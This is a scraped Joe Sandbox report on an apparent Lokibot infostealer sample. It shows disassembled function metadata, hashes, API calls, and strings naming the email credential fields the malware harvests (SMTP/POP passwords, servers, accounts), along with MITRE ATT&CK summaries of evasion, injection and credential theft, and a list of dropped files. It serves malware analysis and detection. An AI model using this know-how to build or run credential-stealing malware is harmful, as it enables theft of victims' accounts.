Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

PopPassword, xrefs: 0040D0D0
Technology, xrefs: 0040D08D
PopAccount, xrefs: 0040D0B6
PopPort, xrefs: 0040D0A7
SmtpAccount, xrefs: 0040D0FA
SmtpPort, xrefs: 0040D0EB
EmailAddress, xrefs: 0040D074
SmtpPassword, xrefs: 0040D117
SmtpServer, xrefs: 0040D0DC
PopServer, xrefs: 0040D099

Memory Dump Source

Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Uniqueness

Uniqueness Score: -1.00%

Function 00402B7C Relevance: 2.5, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Uniqueness

Uniqueness Score: -1.00%

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Uniqueness

Uniqueness Score: -1.00%

Function 004061C3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorLast
String ID: IDA$IDA
API String ID: 887189805-2020647798
Opcode ID: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Uniqueness

Uniqueness Score: -1.00%

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report gunzipped.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WiHDtnb.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gunzipped.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a4saqt0i.zdl.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nx3xeap1.mbz.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v1rg5cf2.b3l.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xe1tyowq.3ch.psm1

C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp

C:\Users\user\AppData\Local\Temp\tmpD4BF.tmp

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

C:\Users\user\AppData\Roaming\WiHDtnb.exe

C:\Users\user\AppData\Roaming\WiHDtnb.exe:Zone.Identifier

Windows Analysis Report
gunzipped.exe

Function 052F772E Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Function 052F7738 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre